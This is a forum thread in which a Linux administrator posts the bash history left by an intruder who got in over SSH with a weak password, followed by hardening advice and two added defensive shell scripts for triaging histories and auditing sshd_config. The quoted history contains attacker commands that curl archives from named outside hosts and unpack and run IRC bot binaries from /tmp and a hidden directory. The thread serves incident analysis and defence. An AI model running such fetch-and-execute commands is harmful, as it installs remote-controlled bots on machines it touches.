Old 06-19-2006, 08:22 AM   #1
gazman1
Member
 
Registered: Jan 2005
Posts: 40

Rep: Reputation: 15
machine break in


OK, I found out one of my boxes was hacked over the weekend, found this in the bash history - any ideas? The file they downloaded and ran is some kind of IRC bouncer.


w
/sbin/ifconfig |grep inet
cat /etc/hosts
passwd
cd ..
cd ..
cd ..
cd /var/tmp
cd ..
cd ..
cd tmp
tar xzvf psydrawin.tar.gz
cd psybnc
chmod +x *
make
./psybnc
cd ..
curl -O www.channel.as.ro/psyd.tar.gz
tar xzvf psyd.tar.gz
cd psybnc
./psybnc
cd ..
curl -O atac.uv.ro/DFL
tar xzvf DFL
cd .virtual
chmod +x *
./darwin
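
As an added example (not part of the original post), the script below replays the `cd` commands in a history like the one above to recover the working directory, then flags downloads, unpacking and execution that happen under /tmp or /var/tmp. The sample input is abridged from post #1, and the unknown starting directory is assumed to be /.

```shell
#!/bin/sh
# Added example (not from the thread): recover the working directory by
# replaying cd, then flag fetch/unpack/execute steps under /tmp or /var/tmp.

triage_history() {
  # Reads history lines on stdin; prints TAG<TAB>cwd<TAB>command per finding.
  awk '
    function resolve(arg,    n, parts, i, p, out) {
      p = (arg ~ /^\//) ? arg : (cwd "/" arg)   # absolute path resets the guess
      n = split(p, parts, "/"); depth = 0
      for (i = 1; i <= n; i++) {
        if (parts[i] == "" || parts[i] == ".") continue
        if (parts[i] == "..") { if (depth > 0) depth--; continue }
        stack[++depth] = parts[i]
      }
      out = ""
      for (i = 1; i <= depth; i++) out = out "/" stack[i]
      cwd = (out == "") ? "/" : out
    }
    BEGIN { cwd = "/" }                          # assumption: start dir unknown
    $1 == "cd" && NF >= 2 { resolve($2); next }
    { tmp = (cwd ~ /^\/(var\/)?tmp(\/|$)/) }     # world-writable temp dirs
    tmp && ($1 == "curl" || $1 == "wget") { print "FETCH\t" cwd "\t" $0; next }
    tmp && $1 == "tar"                    { print "UNPACK\t" cwd "\t" $0; next }
    tmp && $1 ~ /^\.\//                   { print "EXEC\t" cwd "\t" $0 }
  '
}

sample_history() {
  # Abridged from the history in post #1.
  cat <<'EOF'
cd /var/tmp
cd ..
cd ..
cd tmp
tar xzvf psydrawin.tar.gz
cd psybnc
chmod +x *
make
./psybnc
cd ..
curl -O atac.uv.ro/DFL
tar xzvf DFL
cd .virtual
chmod +x *
./darwin
EOF
}

sample_history | triage_history
```

The last finding shows the final binary ran from a hidden directory, /tmp/.virtual, which is easy to miss when reading the raw history.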
 
Old 06-19-2006, 09:04 AM   #2
binary_y2k2
Member
 
Registered: Jul 2005
Location: England, UK
Distribution: Ubuntu 8.04 Server, Kubuntu 12.04
Posts: 698
Blog Entries: 1

Rep: Reputation: 31
Looks like it's definitely some kind of IRC bot.
 
Old 06-19-2006, 09:05 AM   #3
fedora4002
Member
 
Registered: Mar 2004
Posts: 135

Rep: Reputation: 15
Do you know how he got in?
 
Old 06-19-2006, 09:22 AM   #4
gazman1
Member
 
Registered: Jan 2005
Posts: 40

Original Poster
Rep: Reputation: 15
Yep, ssh - I only started here last week and only found out this server had, let's just say, a 3 letter username (very common protocol) with matching password!!! - totally stupid password and username there
 
Old 06-21-2006, 03:18 AM   #5
Fadoksi
Member
 
Registered: Apr 2006
Location: Finland
Distribution: Ubuntu, Gentoo, Debian
Posts: 88

Rep: Reputation: 15
You should unplug your network cable. Then they surely can't come back in.
And then run chkrootkit and rkhunter to check for possible rootkits. And change passwords.

Last edited by Fadoksi; 06-21-2006 at 03:21 AM.
 
Old 06-21-2006, 11:30 AM   #6
gazman1
Member
 
Registered: Jan 2005
Posts: 40

Original Poster
Rep: Reputation: 15
Ah, I just shut down the machine as soon as I found out, just culled the OS and did a re-install with better passwords
 
Old 06-21-2006, 11:45 AM   #7
Fadoksi
Member
 
Registered: Apr 2006
Location: Finland
Distribution: Ubuntu, Gentoo, Debian
Posts: 88

Rep: Reputation: 15
All right then. I hope you have better luck this time
 
Old 06-21-2006, 12:20 PM   #8
unSpawn
Moderator
 
Registered: May 2001
Posts: 29,415
Blog Entries: 55

Rep: Reputation: 3600
"re-install with better passwords"
Is better passes really *all* you did?
 
Old 06-21-2006, 11:48 PM   #9
fedora4002
Member
 
Registered: Mar 2004
Posts: 135

Rep: Reputation: 15
It is better than nothing.
 
Old 06-22-2006, 02:20 AM   #10
Zmyrgel
Senior Member
 
Registered: Dec 2005
Location: Finland
Distribution: Slackware, CentOS, RHEL, OpenBSD
Posts: 1,006

Rep: Reputation: 37
Have you checked the sshd_config file? At least make it more secure and delete all unnecessary services from running.
 
Old 06-22-2006, 07:18 AM   #11
Israfel2000
Member
 
Registered: May 2004
Location: Underground base in the mountains
Distribution: FreeBSD, Fedora, Ubuntu
Posts: 87
Blog Entries: 2

Rep: Reputation: 18
Instead of using password authentication for your ssh use the private key authentication. It's more secure this way. If you are going to use a password remember to change your password frequently. You don't want another hacker to break into your computer.
 
Old 06-22-2006, 07:36 AM   #12
nlinecomputers
Member
 
Registered: Aug 2005
Location: Midland, TX
Distribution: Ubuntu
Posts: 125

Rep: Reputation: 15
I always set SSH to use only keys, to a fixed set of users, and I put it on a different port. NOT 22.
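
The three settings suggested in posts #11 and #12 (key-only logins, a fixed set of users, a non-default port) can be checked with a short audit of sshd_config. This is an added example, not code from any poster; the sample configs and the user names alice and bob are constructed, and the keyboard-interactive check goes beyond what the posts mention.

```shell
#!/bin/sh
# Added example (not from the thread): audit the global section of an
# sshd_config read from stdin. Include files and Match blocks are not followed.

audit_sshd_config() {
  # Prints one line per finding; no output means all checks passed.
  awk '
    /^[ \t]*(#|$)/ { next }                       # comments and blank lines
    { key = tolower($1) }                         # keywords are case-insensitive
    key == "match" { exit }                       # stop at the first Match block
    key == "port"  { ports = ports " " $2; next } # Port may be given several times
    !(key in val)  { val[key] = tolower($2) }     # otherwise the first value wins
    END {
      if (ports == "") ports = " 22"              # sshd default when Port is unset
      if (ports ~ / 22( |$)/)
        print "WARN port: sshd listens on the default port 22"
      if (val["passwordauthentication"] != "no")
        print "FAIL passwordauthentication: password logins accepted (default yes)"
      kbd = val["kbdinteractiveauthentication"]   # older name checked as fallback
      if (kbd == "") kbd = val["challengeresponseauthentication"]
      if (kbd != "no")
        print "WARN kbdinteractive: PAM may still prompt for a password"
      if (!("allowusers" in val))
        print "FAIL allowusers: logins not limited to a fixed set of users"
    }
  '
}

weak_config() {      # constructed sample: password logins on the default port
  cat <<'EOF'
Port 22
#PasswordAuthentication no
PasswordAuthentication yes
EOF
}

hardened_config() {  # constructed sample: alice and bob are made-up accounts
  cat <<'EOF'
Port 2222
PasswordAuthentication no
KbdInteractiveAuthentication no
AllowUsers alice bob
EOF
}

echo "weak:";     weak_config | audit_sshd_config
echo "hardened:"; hardened_config | audit_sshd_config
```

On a live system, `sshd -T` prints the effective configuration in the same keyword/value form, so its output can be piped into the same function.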
 
  

